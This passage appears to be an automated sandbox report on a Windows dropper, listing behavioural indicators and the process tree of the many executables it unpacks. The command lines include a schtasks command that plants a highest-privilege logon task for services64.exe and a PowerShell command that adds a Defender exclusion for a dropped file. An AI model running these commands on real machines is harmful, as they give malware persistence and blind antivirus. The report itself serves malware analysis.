Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2244 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 2388 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4952 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
PID 4952 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
PID 2324 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
PID 2324 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 2976 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 4044 wrote to memory of 2104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 2284 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 4120 wrote to memory of 3572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 2572 wrote to memory of 3984 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
PID 2572 wrote to memory of 3984 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
PID 4932 wrote to memory of 3284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
PID 4932 wrote to memory of 3284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 4444 wrote to memory of 3888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3284 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3888 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3888 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
PID 3572 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3744 -ip 3744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 560

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2104 -ip 2104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1016 -ip 1016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 1056

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd" "
